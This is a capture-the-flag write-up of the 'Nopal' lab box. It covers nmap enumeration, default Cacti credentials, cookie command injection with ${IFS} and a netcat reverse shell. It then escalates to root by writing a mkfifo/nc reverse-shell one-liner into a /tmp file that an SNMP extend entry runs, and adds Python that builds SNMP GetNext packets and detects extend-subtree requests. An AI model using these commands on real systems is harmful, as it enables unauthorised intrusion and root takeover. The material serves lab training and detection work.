Hack. Sleep. Repeat


Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v

# Nmap 7.91 scan initiated Fri Dec  3 09:28:53 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Warning: giving up on port because retransmission cap hit (10).
Increasing send delay for from 320 to 640 due to 229 out of 762 dropped probes since last increase.
Increasing send delay for from 640 to 1000 due to 136 out of 451 dropped probes since last increase.
Nmap scan report for
Host is up (0.14s latency).
Not shown: 37499 filtered ports, 28035 closed ports
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Dec  3 09:30:16 2021 -- 1 IP address (1 host up) scanned in 82.67 seconds

Now let's use Nmap's default scripts and service detection on the one open port to learn more about the target.

nmap -sC -sV -oA nmap/normal -p 80

└─$ nmap -sC -sV -oA nmap/normal -p 80            
Starting Nmap 7.91 ( ) at 2021-12-03 09:58 WAT
Nmap scan report for
Host is up (0.42s latency).

80/tcp open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds

Pwning Nopal was a lot of fun and I learned something new along the way, so without wasting time let's jump in. HTTP is the only open port, so that is where we start.


We land on a Cacti login page that asks for credentials, and the page also discloses the version. Before going further, a quick note on what Cacti is.


Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

Time for some research into default credentials. Luckily I came across guest/guest, and with those we are in.


Since we know the version, let's look for a public exploit in case it is vulnerable. I found an interesting one, but it was a Metasploit module, so I reproduced it manually instead.


It is a remote code execution exploit, so let's run it by hand.

Cacti v1.2.8 Remote Code Execution Manually


Navigating to , we intercept the request with Burp Suite and send it to Repeater.


Right-click and send to Repeater.


The vulnerable input is the session cookie, so we will be injecting our payload into the Cookie header.


If we want to use netcat to gain a shell, we need to build the following payload:


Spaces in the payload are a problem here, so the trick is the ${IFS} shell variable: it expands to the internal field separator (space, tab and newline by default), and the shell then word-splits the result, so nc${IFS}-e ends up as the same two arguments as nc -e. We also have to terminate the original command with ; so that our command runs as a separate statement, as in the payload above.

Let's try it and see the results, URL-encoding the payload first so it survives inside the header:



Start the Ncat listener before sending the payload.


Now we are ready: inject the payload into the cookie and send the request.


After sending, check the Ncat listener.


We have a shell. Let's spawn a TTY to make it more stable.

└─$ nc -nvlp 1337                                 
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 43204
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@nopal:/opt/cacti$ ^Z
zsh: suspended  nc -nvlp 1337
└─$ stty raw -echo;fg
[1]  + continued  nc -nvlp 1337

www-data@nopal:/opt/cacti$ stty rows 17 cols 190
www-data@nopal:/opt/cacti$ export TERM=xterm


The first flag is in /etc/passwd; four more to go. Let's check which ports are listening locally.

www-data@nopal:/opt/cacti$ ss -tulpn
Netid  State      Recv-Q Send-Q                                               Local Address:Port                                                              Peer Address:Port              
udp    UNCONN     0      0                                                                                                                     *:*                  
udp    UNCONN     0      0                                                                                                                        *:*                  
tcp    LISTEN     0      80                                                                                                                      *:*                  
tcp    LISTEN     0      128                                                              *:80                                                                           *:*                   users:(("nginx",pid=420,fd=6))
tcp    LISTEN     0      128                                                                                                                   *:*                  

It looks like SNMP is listening, so let's check its configuration file.


cat /etc/snmp/snmpd.conf gives us another flag, which is nice, but what stands out in the config is the line extend etsctf /tmp/ . The extend directive makes snmpd run that command whenever the matching OID is queried, which looks like a route to RCE through SNMP. Time for some research.


SNMP is sometimes overlooked by the administrator of the device or server, where it is left in a default configuration. An SNMP community with write permissions (rwcommunity) on a Linux host can be abused to let an attacker execute commands on the server.


Source: HackTricks

Extending The Services

While you are not able to modify existing entries that were configured in snmpd.conf, it is possible to add additional commands over SNMP, because the MAX-ACCESS permission setting in the MIB definition is set to read-create.

Adding a new command basically works by appending an additional row to the nsExtendObjects table. Feel free to read more here: SNMP Arbitrary Command Execution and Shell. Now let's jump back to exploiting our target.

In our case we do not even need a write community: the existing extend entry already points at a file under /tmp, which we can write as www-data. So we change directory to /tmp and create the file that will hold our reverse shell payload:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

Save it in , make it executable with chmod +x, and start the Ncat listener before walking the SNMP tree.


Now it is time to walk the tree:

snmpwalk -c public -v1 . -On
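What snmpwalk actually puts on the wire, and what a defender could watch for, is easier to see with a small hand-built SNMPv1 GetNextRequest. This is an added example, not the write-up's own code and not anything from net-snmp; it uses only the Python standard library. It encodes the request for the nsExtendObjects subtree (.1.3.6.1.4.1.8072.1.3.2, where the extend output objects live), parses the packet back, and flags requests that would make snmpd run extend commands. The community string public, request id 1 and UDP port 161 are taken as given; send_getnext() only transmits if you call it with a target.

```python
"""Hand-built SNMPv1 GetNextRequest plus an "extend subtree" detector.

Added example, not from the write-up or net-snmp.  Standard library only.
Assumed: community "public", request-id 1, target UDP port 161.
"""
import socket

# NET-SNMP-EXTEND-MIB::nsExtendObjects.  Reading the output objects under
# this subtree makes snmpd run the "extend" commands from snmpd.conf as the
# user snmpd runs as (root on this box); a read-only community is enough.
NS_EXTEND_OBJECTS = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2)


def _ber_len(n):
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, value):
    return bytes([tag]) + _ber_len(len(value)) + value


def _int(n):
    """INTEGER, two's complement, minimal length."""
    return _tlv(0x02, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True))


def encode_oid(oid):
    """OBJECT IDENTIFIER: first two arcs merged as 40*x+y, then base-128
    big-endian with the high bit set on every octet but the last."""
    out = bytearray()
    for arc in [40 * oid[0] + oid[1], *oid[2:]]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_getnext(community, oid, request_id=1):
    """SNMPv1 message wrapping a GetNextRequest-PDU (context tag [1] = 0xA1)
    with one varbind whose value is NULL, which is what snmpwalk -v1 emits."""
    varbind = _tlv(0x30, encode_oid(oid) + b"\x05\x00")
    pdu = _tlv(0xA1, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf, pos):
    """Return (tag, contents, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(content):
    arcs, cur = [], 0
    for b in content:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    first = min(arcs[0] // 40, 2)          # X.690: the first arc is 0, 1 or 2
    return (first, arcs[0] - 40 * first, *arcs[1:])


def request_oids(packet):
    """Parse an SNMPv1/v2c request into (community, pdu_tag, [oid tuples])."""
    _, msg, _ = _read_tlv(packet, 0)
    _, _, pos = _read_tlv(msg, 0)                 # version
    _, community, pos = _read_tlv(msg, pos)       # community string
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    pos = 0
    for _ in range(3):                            # request-id, error-status, error-index
        _, _, pos = _read_tlv(pdu, pos)
    _, varbinds, _ = _read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbinds):
        _, vb, pos = _read_tlv(varbinds, pos)
        oids.append(decode_oid(_read_tlv(vb, 0)[1]))
    return community.decode(errors="replace"), pdu_tag, oids


def touches_extend_subtree(packet):
    """True when a varbind OID is inside nsExtendObjects or is one of its
    ancestors (a walk started from "." or from enterprises descends into it)."""
    _, _, oids = request_oids(packet)
    k = len(NS_EXTEND_OBJECTS)
    return any(o[:k] == NS_EXTEND_OBJECTS or NS_EXTEND_OBJECTS[:len(o)] == o for o in oids)


def send_getnext(target, community="public", oid=NS_EXTEND_OBJECTS, timeout=2.0):
    """Send one GetNext to target:161 and return the raw reply (None on timeout).
    A walk repeats this with each returned OID until it leaves the subtree."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_getnext(community, oid), (target, 161))
        try:
            return s.recv(4096)
        except socket.timeout:
            return None


if __name__ == "__main__":
    pkt = build_getnext("public", NS_EXTEND_OBJECTS)
    print(pkt.hex())
    print(request_oids(pkt), touches_extend_subtree(pkt))
```

Two caveats for anyone turning touches_extend_subtree into a detection: a walk that starts from "." reaches the extend subtree through a GetNext on the OID just before it, so the first interesting request carries an ancestor OID rather than one under .8072.1.3.2, which is why the ancestor check is there; and because the community here is the read-only public, the execution is triggered purely by reads, so a rule that only watches SetRequest traffic (0xA3) would miss this entirely.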


The walk completes and, as it passes through the extend OID, snmpd executes our script. Since snmpd runs as root, the script runs with root privileges and we get a root shell on the listener.


We spawn a TTY shell again to make it stable, then collect the flags.


/etc/shadow flag


/root flag. The last flag is in an environment variable, so let's look at the running processes.

ps -aux


Interesting, let's grab it.


And we are done.

Greetings from Muzec
